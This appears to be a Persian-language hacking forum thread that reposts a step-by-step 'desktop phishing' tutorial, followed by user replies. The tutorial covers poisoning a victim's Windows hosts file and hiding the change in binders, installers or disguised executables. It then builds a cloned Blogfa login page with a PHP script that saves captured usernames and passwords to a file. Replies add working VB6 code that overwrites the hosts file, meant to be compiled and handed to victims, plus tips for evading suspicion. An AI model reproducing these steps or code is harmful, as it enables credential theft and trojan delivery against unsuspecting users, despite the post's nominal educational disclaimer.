دسکتاپ فیشینگ، سرقت پیشرفته اطلاعات که احتمالا" چیزی از آن نمی دانید
دسکتاپ فیشینگ یک روش نسبتآ جدید سرقت اطلاعات است که اکثر کاربران از آن بی اطلاع هستند. این مطلب را بیشتر از یک سال پیش می خواستم منتشر کنم که به دلایل مختلف فرصت نکردم آن را تمام کنم. امروز همچنان با تعجب می بینم که جایی در وبلاگستان فارسی به آن پرداخته نشده. در نتیجه تصمیم گرفتم خودم دست به کار شوم و کاری که باید زودتر از اینها به پایان می رساندم را تمام کنم. این در حالی است که ایرانی های فعال در حوزه امنیت کامپیوتر و شبکه با این روش به خوبی آشنا هستند اما انگار حوصله به اشتراک گذاشتن اطلاعات شان را ندارند!
توجه: این مطلب صرفآ جهت مقاصد آموزشی نوشته شده است و مسئولیت هرگونه استفاده نادرست از این اطلاعات به عهده خواننده است.
فیشینگ چیه؟
فیشینگ یک تکنیک قدیمی (بیشتر از بیست سال پیش) برای سرقت اطلاعات کاربران است که همچنان امروز هم مورد استفاده هکر ها است. فیشینگ به زبان ساده یعنی صفحه ای شبیه صفحه لاگین یک سایت معتبر که حاوی کدی است که آنچه شما در قسمت نام کاربری و رمز وارد می کنید را به طور مخفیانه برای هکر می فرستد. مثلآ یک صفحه که عینآ شبیه صفحه لاگین یاهو است با این تفاوت که وقتی روی دکمه Login کلیک می کنید اطلاعات شما اول به طور مخفیانه برای هکر ارسال شده و سپس وارد یاهو می شوید.

شما در ادامه همین مطلب قسمت اول این اموزش را بصورت تصویری همراه با مثال و حرفه ای یاد خواهید گرفت و به همه دوستان توصیه میکنم با حوصله اینو یاد بگریند.



فیشینگ چیه؟
فیشینگ یک تکنیک قدیمی (بیشتر از بیست سال پیش) برای سرقت اطلاعات کاربران است که همچنان امروز هم مورد استفاده هکر ها است. فیشینگ به زبان ساده یعنی صفحه ای شبیه صفحه لاگین یک سایت معتبر که حاوی کدی است که آنچه شما در قسمت نام کاربری و رمز وارد می کنید را به طور مخفیانه برای هکر می فرستد. مثلآ یک صفحه که عینآ شبیه صفحه لاگین یاهو است با این تفاوت که وقتی روی دکمه Login کلیک می کنید اطلاعات شما اول به طور مخفیانه برای هکر ارسال شده و سپس وارد یاهو می شوید.



حالا دسکتاپ فیشینگ چیه؟
دسکتاپ فیشینگ یک مدل جدید تر از فیشینگ است که مشکلاتی که فیشینگ قدیمی دارد را ندارد. مهم ترین تفاوت دسکتاپ فیشینگ با فیشینگ معمولی این است که در دسکتاپ فیشینگ لینک صفحه ای که حاوی کد مخرب است هیچ تفاوتی با لینک سایت اصلی نخواهد داشت! یعنی کاربر مثلآ آدرس سایت را همان yahoo.com می بیند و ابدآ شک نمی کند که این فرم بتواند یک صفحه فیشینگ باشد. در حالی که در فیشینگ قدیمی صفحه فیشینگ باید در یک لینک جدا قرار داشته باشد و کاربر با کمی دقت به سادگی می تواند متوجه شود که وارد یک صفحه تقلبی شده است. مزیت دیگر دسکتاپ فیشینگ این است که نیازی به طراحی یک صفحه تقلبی جداگانه برای هر سایت نیست و با یک کد می توان تمام سایت ها را آلوده کرد.




مگه میشه؟!
بله، در دسکتاپ فیشینگ نفوذگر با روش های متفاوت فایل مرتبط به DNS را تغییر می دهد (در ویندوز فایل hosts). این باعث می شود شما لینک های سایت ها را همانطور که هستند ببینید و فکر نمی کنید که دارید یک صفحه تقلبی را مشاهده می کنید اما آنچه در مرورگر شما لود شده است در اصل صفحه ای تقلبی است که حاوی کد های مخربی است که اطلاعاتی که شما در فرم های وارد می کنید را به نفوذگر می فرستد.

چطوری؟
من تا جایی که می شد ماجرا را براتون ساده کردم. اگر همچنان دقیق متوجه نمیشید که این روش چطوری کار می کنه باید یاد بگیرید DNS چیه و چی کار می کنه. من براتون به زبان ساده توضیح میدم. کامپیوتر ها آدرس سایت ها را با یک سری عدد به اسم «آدرس IP» می شناسند و اسم خود سایت مثلآ yahoo.com براشون معنی نداره. هر موقع شما تایپ کنید yahoo.com و بخواهید وارد سایت یاهو شوید کامپیوتر تان باید بداند آدرس IP سایت یاهو چیست تا بتواند سایت را برای شما باز کند. کامپیوتر تان اول دفترچه یادداشت خودش را نگاه می کند تا ببیند می داند این آدرس چیست یا خیر، اگر در دفترچه خودش نداشت (همان فایل hosts که راجع بش صحبت کردیم) از DNS می پرسد و DNS آدرس IP سایت مورد نظر را به کامپیوتر می گوید.

ما با اضافه کردن یک خط تقلبی به این دفترچه یادداشت کامپیوتر را گول می زنیم تا فکر کند که می داند آدرس سایت چیست اما ما به جای آدرس واقعی آدرس کد مخرب خودمان را می گذاریم. در این حالت کامپیوتر محتوای صفحه مخرب را باز می کند اما فکر می کند این همان سایت یاهو است در نتیجه لینک ها هم همگی واقعی به نظر می رسند.

میشه با مثال نشون بدی؟


1. وارد آدرس C:Windows/System32/drivers/etc شوید و فایل hosts را با نت پد باز کنید.

2. دو خط زیر را به این فایل اضافه کنید (بعد از خط هایی که با # شروع شده اند):(اول آی پی رو وارد کنید و بعد با space آدرس سایت)
207.182.152.130
blogfa.com
(خط دوم )
207.182.152.130
[Only registered and activated users can see links]
فایل را ذخیره کنید و مرورگر خود را باز و بسته کنید.
3. حالا وارد سایت بلاگفا شوید، می بینید که وارد سایت آشیانه میشود اما لینک همچنان سایت بلاگفا را نشان می دهد.
اگر همچنان صفحه بلاگفا را می بینید مطمئن شوید فایل را به درستی ذخیره کرده اید و مرورگر خود را باز و بسته کرده اید. در نهایت ممکن است مجبور باشید دیسکانکت شوید و دوباره به اینترنت وصل شوید.

الان چی کار کردیم؟
ما فایل hosts که همون دفترچه کامپیوتر مون باشه را تغییر دادیم و توش نوشتیم آدرس IP سایت بلاگفا 207.182.152.130 هست در حالی که این عدد مربوط به سایت آشیانه هست. در نتیجه وقتی کامپیوتر خواست بلاگفا را باز کند آن خط را خواند و گول خورد و سایت من را باز کرد، با این فکر که این همان بلاگفاست است

پس کد مخرب و این برنامه ها چی شد؟
تو این پست من می خواستم خیلی جلوتر از اینها برم و ریزه کاری های «بازوی فیشینگ» که اصل کار را انجام میده را توضیح بدم. اما مطالب را کاربران مختلفی می خوانند و ما می خواهیم که آنهایی که تازه کار هستند هم بتوانند مطالب را دنبال کنند. به همین دلیل مباحث پایه را با جزئیات و به زبان غیر فنی بررسی کردیم.

همان طور که قول داده بودم این هم قسمت اصلی
توجه: این مطلب صرفآ جهت مقاصد آموزشی نوشته شده است و مسئولیت هر نوع استفاده از این محتوا به عهده خواننده است.

گفتیم اول باید اون فایل hosts را تغییر بدیم، اما چطوری؟
این کار (اعمال تغییرات روی فایل های قربانی) خودش یک زیرشاخه عظیم در بحث امنیت هست و صد ها روش و تکنیک مختلف برایش وجود داره و هر نوع آسیب پذیری که به شما اجازه بده اون فایل را تغییر بدید می تونه مناسب باشه، حالا از یک ماکرو اکسل گرفته تا یک فایل bat یا self-extracting archive و… من در اینجا به چند روش جالب اشاره می کنم.

self-extracting archive: این فایل ها مثل یک مینی installer هستند و فایل ها را در آدرس هایی که می خواهید استخراج می کنند. 7zip و KGB Archiver از این فایل های می سازند اما گزینه های مورد نظر ما را WinRAR خیلی بهتر از بقیه ارائه می کند (نسخه امتحانی کافیه).


در مطلب قبل به اصول پایه حمله «دسکتاپ فیشینگ» پرداختیم. باید بگم بازتاب خوانندگان فوق العاده بود و از تمام کسانی که با نظرشان ابراز علاقه کردند تشکر می کنم. همان طور که قول داده بودم در این مطلب بیشتر وارد جزئیات میشیم پس ادامه را با دقت دنبال کنید.


توجه: این مطلب صرفآ جهت مقاصد آموزشی نوشته شده است و مسئولیت هر نوع استفاده از این محتوا به عهده خواننده است.گفتیم اول باید اون فایل hosts را تغییر بدیم، اما چطوری؟
این کار (اعمال تغییرات روی فایل های قربانی) خودش یک زیرشاخه عظیم در بحث امنیت هست و صد ها روش و تکنیک مختلف برایش وجود داره و هر نوع آسیب پذیری که به شما اجازه بده اون فایل را تغییر بدید می تونه مناسب باشه، حالا از یک ماکرو اکسل گرفته تا یک فایل bat یا self-extracting archive و… من در اینجا به چند روش جالب اشاره می کنم.

self-extracting archive: این فایل ها مثل یک مینی installer هستند و فایل ها را در آدرس هایی که می خواهید استخراج می کنند. 7zip و KGB Archiver از این فایل های می سازند اما گزینه های مورد نظر ما را WinRAR خیلی بهتر از بقیه ارائه می کند (نسخه امتحانی کافیه). راهنمای تصویری؟(یا اینجا)


نکته: می توانید با استفاده از Binder ها آرشیو را با یک فایل اجرایی دیگه (مثلآ setup یک بازی) ادغام کنید

رونویسی فایل با Installer: برنامه های زیادی نظیر Inno Setup و Install Jammer هستند که به شما این امکان را می دهند که فایل های مختلفی را روی سیستم نصب کنید. فقط کافی است یک نسخه از یک فایل hosts آلوده شده را هم به عنوان فایل جانبی برنامه ای که قرار است نصب بشود اضافه کنید و مقصد فایل را پوشه etc قرار دهید
در دو روش بالا فایل hosts با اون فایلی که شما اضافه می کنید عوض میشه در نتیجه اگر کاربری به هر دلیلی از قبل برای سایر استفاده ها چند خط به hosts اضافه کرده بوده این تغییرات از بین میره و باعث زودتر فهمیدن قربانی می شود. هر چند اکثر کاربران حتی از وجود این فایل هم با خبر نیستند.

فرمان های ویندوز: با چند دستور ساده میتونیم خطوطی که می خواهیم را به فایل hosts اضافه کنیم. کد زیر نمونه ای از Windows Batch Programming است
[Only registered and activated users can see links]
خط اول، دستوراتم را فقط اجرا کن، به من نشون نده.

خط دوم و سوم، آن چه در میان گیومه ها هست را به انتهای فایل hosts اضافه کن.

اگر کد بالا را با پسوند bat ذخیره کنید یک اسکریپت کامل دارید که کاری که می خواهید را انجام میده. خوبی این روش اینه که فایل همانطور که هست باقی میمونه و خطوط ما فقط به آن اضافه میشه.

مشکل این روش اینه که فایل با پسوند bat را نمی تونید به عنوان یک برنامه بدیم به قربانی. فقط کافیه طرف فایل را با نت پد باز کنه و همه چیز لو میره، از جمله IP سرور شما.

فایل اجرایی: با این کار در اصل همان دستورات مرحله قبل را با برنامه نویسی ++C به عنوان یک فایل اجرایی در میاریم که آنالیز کردنش برای قربانی ها سخت تر خواهد بود و می توان با ادامه دادن کد آن را به شکل یک برنامه کاربردی در آورد، مثلآ یک ماشین حساب ساده
[Only registered and activated users can see links]

همانطور که گفتم روش های معرفی شده مستقیمآ به فیشینگ ربطی ندارند. به همین دلیل من وارد جزئیات هر کدام نشدم. اگر اینها خیلی سخت به نظر می رسند احتمالآ بهتر است فعلآ به ماهی گیری فکر نکنید!

از اینجا نحوه پیاده سازی حمله اصلی را توضیح می دهم، برای دنبال کردن آموزش نیاز به امکانات خاصی نخواهید داشت در نتیجه توصیه می کنم هر مرحله را با دقت دنبال کنید و خودتان روی کامپیوتر انجام دهید.

اگر یادتان باشد گفتم در دسکتاپ فیشینگ نیازی به طراحی جداگانه صفحات برای هر سایت نیست. این در صورتی است که ما یک «بازوی فیشینگ» هوشمند بنویسیم و آن را بین راه کاربر قرار دهیم (حمله MITM). نوشتن این بازو به دانش عمیق برنامه نویسی و آموزش دادن آن به ده ها پست وبلاگی نیاز دارد. در این آموزش برای سادگی کار فقط روی بلاگفا کار میکنیم

این آموزش فقط برای بالا بردن سطح دانش کاربران جهت مقابله با نفوذگران و شبیه سازی کردن یک شرایط واقعی نوشته شده است.

1. xampplite را دانلود و نصب کنید.

2. جایی که xampplite را نصب کردید وارد پوشه apache سپس پوشه conf شده و فایل [Only registered and activated users can see links] را باز کنید. در خط 178 (DocumentRoot) بعد از htdocs اضافه کنید phishing/

این طوری ریشه سرور به پوشه phishing تغییر پیدا می کند. پس این پوشه را در htdocs بسازید.

3. در پوشه phishing یک فایل به نام index.php بسازید و کد زیر را در آن بنویسید

[Only registered and activated users can see links]


4. آپاچی را اجرا کنید (از xampp-control.exe).
[Only registered and activated users can see links]

نکته: در این آموزش ما خودمان هم نفوذگر هستیم و هم قربانی، چون نمی خواهیم از دو کامپیوتر استفاده کنیم.

علت اینکه در شرایط واقعی حتمآ باید IP اختصاصی داشته باشیم اینه که در hosts فقط می تونیم IP اضافه کنیم (نه URL) در نتیجه صفحه تقلبی یا هر نوع اسکریپت دیگری که داریم باید در قسمت ریشه سرور ذخیره شده باشد و با یک آی پی اختصاصی مستقیمآ قابل دسترسی باشد.

5. سایت بلاگفا را باز کنید و از گزینه Save As با اسم blogfa ذخیره کنید. مطمئن شوید که Save as type را روی Complete گذاشته اید.

[Only registered and activated users can see links]

. با هر روشی که دوست دارید فایل هاست را تغییر بدهید و دو خط زیر را به آن اضافه کنید
[Only registered and activated users can see links]

برای کامپیوتر یعنی «آی پی خودم»، در اینجا چون نمی خواهیم از کامپیوتر دیگری استفاده کنیم خودمان هم قربانی هستیم و هم هکر (سرور). در شرایط واقعی این آدرس باید IP سرور اختصاصی باشد.

7. حالا وارد سایت بلاگفا شوید، اگر همه چیز را درست انجام داده باشید باید به جای صفحه اصلی بلاگفا صفحه پیغام Apache is up را مشاهده کنید.

تا اینجا ما سرور اختصاصی خودمان را راه انداخته ایم و با موفقیت سیستم قربانی را هم آلوده کرده ایم تا به جای بلاگفا به سرور ما منتقل شود. حالا باید صفحه تقلبی را بسازیم.

نکته مهم: چون ما «بازوی فیشینگ» هوشمندی نمی سازیم روش ما دو کمبود اصلی خواهد داشت.

اول اینکه باید صفحه تقلبی را به صورت دستی بسازیم و این یعنی باید تمام فایل های گرافیکی که اون صفحه تقلبی را تشکیل می دهند را هم روی سرور مان داشته باشیم چون قربانی به بلاگفا واقعی دسترسی ندارد و مثلآ نمی تواند لوگوی بلاگفا را از سرور واقعی بگیرد. برای قربانی blogfa.com به معنی ریشه سرور شما (نفوذگر) خواهد بود و مثلآ blogfa.com/header.png نه به فایل روی سرور واقعی بلکه به سرور شما اشاره می کند. این یعنی هر محتوای زنده ای که در صفحه جعل شده وجود داشته باشد هم نمی تواند آپدیت شود و همیشه یکسان باقی می ماند (مثلآ آخرین وبلاگ های به روز شده…). همچنین مثلآ اگر ظاهر صفحه واقعی تغییر کند صفحه جعل شده همچنان مثل قبل باقی می ماند.

دوم، به خاطر همان مشکلی که در نکته اول توضیح دادم سایر لینک های بلاگفا از کار می افتند، مثلآ اگر قربانی وارد صفحه اول شود – و ما صفحه اول را جعل کرده باشیم – اگر قربانی به جای وارد کردن اطلاعات از فرم صفحه اول تصمیم بگیرد روی لینک «ورود کاربران» کلیک کند با پیغام Object not found مواجه می شود چون تنها صفحه ای که روی سرور شما وجود دارد همان صفحه اصلی است.

با نوشتن یک بازوی هوشمند هر دو مشکل برطرف می شود. در این مثال ما فقط صفحه اول را جعل می کنیم،

8. حالا به جایی که در مرحله 5 صفحه را ذخیره کردید بروید و محتوای فایل html ای که ذخیره کردید را به جای کدی که برای “Apache is up” در فایل index.php داشتیم ذخیره کنید.

جایی که صفحه را در مرحله 5 ذخیره کردید باید یک پوشه به نام blogfa_files باشد. این پوشه را هم با جاش منتقل کنید کنار فایل index.php واقع در پوشه phishing.

9. حالا دوباره سایت بلاگفا را باز کنید. اگر همه مراحل را به درستی انجام داده باشید باید صفحه بلاگفا را با ظاهری خیلی شبیه به صفحه اصلی ببینید (می توانید با باز کردن آی پی 38.113.162.27 صفحه اصلی را ببینید).

حالا یک نکته کوچولو، باید favicon (آیکون کنار آدرس سایت) را درست کنیم. برای این کار favicon را از [Only registered and activated users can see links] می گیریم. بعد از ذخیره کردن آیکون با اسم favicon.ico و قرار دادن آن در کنار فایل index.php باید به طور اتوماتیک توسط مرورگر نمایش داده شود (گاهی اوقات به خاطر باگ مرورگر ها و cache همان لحظه دیده نمی شود).


به هشت فایل پشت زمینه هم در style.css اشاره شده که آنها را هم باید جداگانه دانلود کرده و در پوشه images کنار بقیه فایل ها قرار دهید تا پشت زمینه دکمه ها و صفحه درست شبیه نسخه اصلی شود. همچنین احتمالآ تغییر ظریفی برای نمایش تبلیغات باید انجام بدهید که آن را به عهده خودتان می گذارم.

حالا که ظاهر سایت را درست کردیم فقط باید قسمت لاگین را دستکاری کنیم تا بتوانیم آنها را ذخیره کنیم.

10. در کنار فایل index.php یک فایل جدید بسازید به نام login.php، این فایل قرار است action فرم لاگین بشود. یعنی اطلاعاتی که در فرم ثبت می شود به این فایل فرستاده می شود تا پردازش شود. در این فایل ما باید کدی بنویسیم که اطلاعات دریافتی را در یک فایل دیگر ذخیره کند.

کد زیر (+) را در فایل login.php قرار دهید:

[Only registered and activated users can see links]


خط اول، کاربر را سریعآ به صفحه اول بر می گرداند، انگار که قسمت لاگین درست کار نمی کند. در غیر این صورت فقط یک صفحه سفید دیده میشه.

خط دوم، میگیم فایل Pass.txt را بساز و اگر وجود داره بهش اضافه کن.

خط سوم، نام کاربری را در فایل بنویس و برو سر خط.

خط چهارم، رمز را در فایل بنویس و برو سر خط.

خط پنجم، تاریخ و ساعت را بنویس، یک خط فاصله بده و برو سر خط.

خط شش، کارمون تموم شد.

حالا بازوی نه چندان باهوش ما آماده است و فقط باید فرم را به جای مقصد اصلی به فایل خودمان هدایت کنیم، برای این کار در فایل index.php عبارت =action را جستجو کنید و مقدار آن را به login.php تغییر دهید.

ست ماهی گیری شما آماده است! حالا صفحه را ریفرش کنید و یک نام کاربری و کلمه عبور الکی در فرم وارد کرده و لاگین کنید. می بینید هیچ اتفاقی نمی افته و فقط انگار صفحه ریفرش میشه
[Only registered and activated users can see links]


حالا اگر کنار فایل index.php را نگاه کنید یک فایل جدید به نام Pass.txt می بینید که حاوی اطلاعات صید شده است.

[Only registered and activated users can see links]

همانطور که می بینید الان هر چیزی در آن فرم نوشته بشه در فایل ثبت میشه، حتی اگر اطلاعات صحیح یا واقعی نباشه. با بهبود اسکریپتی که نوشتیم می توانیم قبل از ذخیره کردن چک کنیم که اطلاعات لاگین معتبر باشه که فقط اطلاعات صحیح را بگیریم. همچنین می توانیم بعد از ذخیره اطلاعات، فرم را پشت پرده برای بلاگفا submit کنیم و کاربر را وارد بلاگفای واقعی کنیم. این طوری سیستم لاگین هم خراب به نظر نمی آید و همه چیز طبیعی به نظر می رسد.

امیدوارم از این مطلب استفاده برده باشید، از آن چه یاد گرفتید استفاده بد نکنید. در مطالب بعدی اگر استقبال زیاد باشه نحوه دفع این حملات را بررسی خواهیم کرد.

جواب داد حتی نیاز به باز وبسته کردن مرورگر هم نبود:24:

دوست عزیز آموزش خوبی بود دستت درد نکنه. من روی خودم تست کردم نشد شایددستورات رااشتباه وارد کردم اگه می شه یه آموزش تصویری از نحوه ی انجام کاربزارید ممنونت می شم.

من به این شاخه رفتم: C:\WINDOWS\system32\drivers\etc

ولی فایلی به نام hosts نبودفقط یه فایل به نام lmhosts.sam بود

دوست من این کار زمانی است که شخصی در پشت کامپیوتر شما نشسته ولی برای اینکه پیشینگ را یاد بگیرین سری به لینک

زیر بزن

[Only registered and activated users can see links]

موفق باشید

شما می تونید این عمل رو در شبکه هم انجام بدید ... البته باید شما گت وی شبکه باشید
یا شبکه به صورت بروتکست باشه تا جواب بده

کارهای جالبی میشه کرد ولی
یک سوال ...
اومدیم ما این کارو کردیم طرف هم یوزر و پسورد رو زد صفحه ریفرش شد ... دوباره وارد کرد باز صفحه ریفرش شد ... خوب شک می کنه
یک روش یاد بده که اتومات بره تو سایت اصلی یاهو .... یادت باشه dns ست کردی ...!!!!

دوست من این کار زمانی است که شخصی در پشت کامپیوتر شما نشسته ولی برای اینکه پیشینگ را یاد بگیرین سری به لینک

زیر بزن

[Only registered and activated users can see links]

موفق باشید

اصلا این طور نیست شما با یه برنامه می تونید تو کامپیوتر تارگت اون دو خط رو اضافه کنید
من چون هاست و سایت نداشتم مجبور شدم آی پی رو بدم 127.0.0.1 اما شما آی پی سایت خودتون رو به تارگت میدید و موقعی که مثلا میزنه blogfa.com میاد تو ساید شما (در صورتی که در آدرس بارش هم نوشته blogfa.com) و چون سایت شما شبیه صفحه ی لاگینه پسورد خودش رو وارد می کنه لطفا تاپیک رو با دقت بخون
در ضمن اول یاد بگیرید کلیپ هارو با حجم کمتر بدی بیرون

شما می تونید این عمل رو در شبکه هم انجام بدید ... البته باید شما گت وی شبکه باشید
یا شبکه به صورت بروتکست باشه تا جواب بده

کارهای جالبی میشه کرد ولی
یک سوال ...
اومدیم ما این کارو کردیم طرف هم یوزر و پسورد رو زد صفحه ریفرش شد ... دوباره وارد کرد باز صفحه ریفرش شد ... خوب شک می کنه
یک روش یاد بده که اتومات بره تو سایت اصلی یاهو .... یادت باشه dns ست کردی ...!!!!

submit کنی موقعی که لاگین کرد هم پسورد ثبت شه هم به به سایت واقعی بره (البته در کد بجای اینکه آدرس اصلی سایت رو بدید باید آی پی سایت رو داد)

برنامه نویسان ویژوال بیسیک 6 هم می توانند با کد های ساده زیر کار های پست اول را انجام دهند.
On Error Resume Next
Open Environ("winDir") + "\System32\Drivers\etc\hosts" For Output As #1
Dim X As String
Dim IP As String
Dim Site As String
IP = "127.0.0.1" 'Your IP
Site = "example.com" 'Your Site
X = IP + " " + Site + vbCrLf + IP + " " + "[Only registered and activated users can see links]" + Site
Print #1, X
Close #1
End

کافیست کد های بالا را کامپایل کنید و برنامه به دست آمده را به طرف مقابل بدهید تا گام اول فیشینگ انجام شود.
توجه:
به جای 127.0.0.1 آیپی مورد نظر را بنویسید. همچنین به جای example.com آدرس سایت مورد نظر را بدون www ابتدا بنویسید.

برنامه نویسان ویژوال بیسیک 6 هم می توانند با کد های ساده زیر کار های پست اول را انجام دهند.
On Error Resume Next
Open Environ("winDir") + "\System32\Drivers\etc\hosts" For Output As #1
Dim X As String
Dim IP As String
Dim Site As String
IP = "127.0.0.1" 'Your IP
Site = "example.com" 'Your Site
X = IP + " " + Site + vbCrLf + IP + " " + "[Only registered and activated users can see links]" + Site
Print #1, X
Close #1
End

کافیست کد های بالا را کامپایل کنید و برنامه به دست آمده را به طرف مقابل بدهید تا گام اول فیشینگ انجام شود.
توجه:
به جای 127.0.0.1 آیپی مورد نظر را بنویسید. همچنین به جای example.com آدرس سایت مورد نظر را بدون www ابتدا بنویسید.


با سلام
یه سوال؟...
اگه بخوام چند سایتو آی پی بزارم بهتره بعد Close دوباره همینارو بنویسم یا چند متغیر دیگه تعریف کنم .مثل Ip1,ip2,ip3.. و site1,site2,site3...
:21:

با سلام
یه سوال؟...
اگه بخوام چند سایتو آی پی بزارم بهتره بعد Close دوباره همینارو بنویسم یا چند متغیر دیگه تعریف کنم .مثل Ip1,ip2,ip3.. و site1,site2,site3...
:21:

چند تا متغیر تعریف کنید بهتر است چون فایل 1 بار باز و بسته می شود اما این روش باز هم بهتر است:

Dim i As Byte
Dim X As String
Dim IP(100) As String
Dim Site(100) As String
IP(1) = "127.0.0.1"
IP(2) = "127.0.0.2"
IP(3) = "127.0.0.3"
Site(1) = "example1.com"
Site(2) = "example2.com"
Site(3) = "example3.com"
On Error Resume Next
Open Environ("winDir") + "\System32\Drivers\etc\hosts" For Output As #1
For i = 1 To 100
If IP(i) <> "" And Site(i) <> "" Then
X = ""
X = IP(i) + " " + Site(i) + vbCrLf + IP(i) + " " + "[Only registered and activated users can see links]" + Site(i) + vbCrLf
Print #1, X
End If
Next i
Close #1
End

اگر سوالی بود در خدمتم :)

این نوع فیشینگ رو کروم گوگل جواب نمی ده (محض اطلاع دوستان )

این نوع فیشینگ رو کروم گوگل جواب نمی ده (محض اطلاع دوستان )

فایل رل درست ویرایش کردین؟
سیستم را یکبار ریستارت کردین؟؟
بقیه دوستان هم این نظر را دارن؟

این نوع فیشینگ رو کروم گوگل جواب نمی ده (محض اطلاع دوستان )

آقا چرا شایعه درست می کنید؟!

من همین الان با ویندوز 7 و گوگل کروم 10 حتی بدون ریستارت آزمایش کردم و این کار به درستی انجام شد. (محض اطلاع دوستان)

یکی از پایه های مهم این کار داشتن آی پی اختصاصیه اونو چه جوری باید تهیه کرد؟

داداش اموزشی که گذاشتی خوب بود
ولی حوصله میخواد خوندن این همه مطلب
اگه بتونی یه اموزش تصویری بسازی بهتره;)

ممنون خوب بود. اما عکس ها لود نشدن و فقط متن ها قابل دسترسی بود...
میشه عکس ها رو یه جایی آپ کنید که خالا خالا ها فیلتر نشه!؟؟؟؟؟؟؟؟؟؟؟

بازم ممنون

سلام دوستان
ویندوز من 7 هستش ولی اجازه تغییر در فایل hosts رو نمیده ، چیکار باید کرد؟

سلام دوستان
ویندوز من 7 هستش ولی اجازه تغییر در فایل hosts رو نمیده ، چیکار باید کرد؟

سلام دوستان
ویندوز من 7 هستش و اجازه تغییر در فایل hosts رو نمیده ، چیکار باید کرد؟

یه فایل rar درست کن و آدرس استرکت شدن رو بده مسیر همین فایل تو ویندوز ، محتویات فایل rar همون ادیت شده ی فایل مورد نظر باشه
برای خوشکلی کار ! می تونی آیکن رو هر چی دوست داری بزاری + یه سری خلاقیت های دیگه ...

یکی از پایه های مهم این کار داشتن آی پی اختصاصیه اونو چه جوری باید تهیه کرد؟

یک هاست فری

استارتر محترم بهتر بود به حق کپی رایت احترام بگذارید و منبع رو هم ذکر میکردید !
منبه این مطلب سایت زنگوله ست
به جز زنگوله هیچ کجا آموزش درباره دسکتاپ فیشینگ وجود نداره


و همچنین با وجود ssl دسکتاپ فیشینگ هم به تاریخ پیوسته و دیگه کاربرد نداره تقریبا

استارتر محترم بهتر بود به حق کپی رایت احترام بگذارید و منبع رو هم ذکر میکردید !
منبه این مطلب سایت زنگوله ست
به جز زنگوله هیچ کجا آموزش درباره دسکتاپ فیشینگ وجود نداره


و همچنین با وجود ssl دسکتاپ فیشینگ هم به تاریخ پیوسته و دیگه کاربرد نداره تقریبا

wtf????

زنگوله؟ عجب!

کی گفته این رو به شما؟ عزیز من این روش اولین بار تو فروم های خارجی پابلیک شد بعد هم چیز اونقد جدیدی نیست !

چیز خاصی هم نداره دیگه 1 خط آیپی اضافه کردن به لیست که این حرفا رو نداره! متد های پرایوتش هم به زودی پابلیک میکنم تا متوجه بشید که داستان از چه قراره و هنوز به تاریخ نپیوسته! همه چیز اونی نیست که توی سایت ها میخونید خیلی چیزارم نباید گفت که مثل همین الآن کسی نیاد بگه متد برای من بوده و فلان ;)

موفق باشید

wtf????

زنگوله؟ عجب!

کی گفته این رو به شما؟ عزیز من این روش اولین بار تو فروم های خارجی پابلیک شد بعد هم چیز اونقد جدیدی نیست !

چیز خاصی هم نداره دیگه 1 خط آیپی اضافه کردن به لیست که این حرفا رو نداره! متد های پرایوتش هم به زودی پابلیک میکنم تا متوجه بشید که داستان از چه قراره و هنوز به تاریخ نپیوسته! همه چیز اونی نیست که توی سایت ها میخونید خیلی چیزارم نباید گفت که مثل همین الآن کسی نیاد بگه متد برای من بوده و فلان ;)

موفق باشید

این چیزهایی که گفتید مهم نیستند
مهم اینه که مطلب شما کپی از یه وبلاگ شخصیه که وظیفه تون بوده منبع رو ذکر کنید
که نکردید

بقیه هم میتونند با گوگلینگ اصل همین مطلب رو تو زنگوله بیابند
البته فیلــتره

فیشینگ صوتی چیه؟

مرسی دوست عزیز...
من با همه مروگرهای وب تست کردم جواب داد....

سلام دوستان این برنامه ای بود که در پست قبلی قول نوشتنشو داده بودم.
لطفا چک کنید و اگه مشکلی داره بگید تا اصلاحش کنم
به اسم آشیانه نوشتمش :-*





ممنون دوست عزیز ولی اگه اخر اون فیلم یه توضیحی هم از نرم افزارت میگفتی بهتر میشد
میشه توضیح بدی؟ به چه شکلی میشه اینو به قربانی داد؟

سلام سلام سلام
ببخشید امروز دیر اومدم :دی
توی پیش فرض نرم افزار من سایت گوگل رو زدم و IP سایت آشیانه! تا اینجا که تابلوهههههههههههه

خب حالا اگه آدرس رو داخل اون قسمت برنامه به Yahoo.com و [Only registered and activated users can see links] تغییر بدی و برنامه رو اجرا کنی،
بجای سایت یاهو سایت آشیانه باز میشه!

حالا اگه دوست درارید بجای سایت آشیانه سایتی دیگه باز شه ، داخل برنامه ی من ، بجای IP آشیانه ، IP سایت مورد نظرتو بزن! فقط یادت باشه IP باید استاتیک باشه!
مثلا اگه بری داخل persiangig یک صفحه واسه خودت درست کنی به درد نمیخوره چون IP استاتیک نیست.
در کل اگر میخوای سایت شخصی خودتو باز کنی (برای fake page) باید بری برا خودت دامنه بخری......


اگه بازم سوالی هست تا ویدئو بذارم



یعنی تو هیچ کدوم از هاست های رایگان امکانش نیست که fake page اپ کنیم ؟؟
باتشکر

سلام
ببخشید سوالی دارم
برای اینکار باید هاست و ip اختصاصی بابد داشته باشیم درسته ؟
مثلا وقتی برای کسی فایل را ارسال میکنیم و روش کلیک میکنه پس باید هاست و ip اختصاصی داشته باشیم درسته ؟
بعد سوالی مثلا باید ping ip سایت یاهو را بگیریم و بعد تنظیم کنیم که به ip سایت خودمن بیاد که صفحه تقلبی درست کردیم درسته ؟
خوب مثلا اگر آن شخص خواست برود مستقیما خودش تایپ کند login.yahoo.com خوب به صفحه تقیلبی ما میاد اما اگر صفحه اصلی یاهو yahoo.com را تایپ کرد و باز هم به صفحه تقلبی ما میاد چون ip های سایت یاهو یکی است درسته ؟ خوب این کارشک بر انگیز نیست یا راه حلی دارد ؟
ممنون میشوم توضیح دهید
باتشکر
خداحافظ

سلام
ببخشید سوالی دارم
برای اینکار باید هاست و ip اختصاصی بابد داشته باشیم درسته ؟
مثلا وقتی برای کسی فایل را ارسال میکنیم و روش کلیک میکنه پس باید هاست و ip اختصاصی داشته باشیم درسته ؟
بعد سوالی مثلا باید ping ip سایت یاهو را بگیریم و بعد تنظیم کنیم که به ip سایت خودمن بیاد که صفحه تقلبی درست کردیم درسته ؟
خوب مثلا اگر آن شخص خواست برود مستقیما خودش تایپ کند login.yahoo.com خوب به صفحه تقیلبی ما میاد اما اگر صفحه اصلی یاهو yahoo.com را تایپ کرد و باز هم به صفحه تقلبی ما میاد چون ip های سایت یاهو یکی است درسته ؟ خوب این کارشک بر انگیز نیست یا راه حلی دارد ؟
ممنون میشوم توضیح دهید
باتشکر
